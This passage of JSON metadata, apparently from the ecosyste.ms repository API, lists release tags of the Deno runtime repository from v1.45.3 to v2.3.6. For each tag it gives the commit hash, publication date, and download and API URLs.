ncy_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts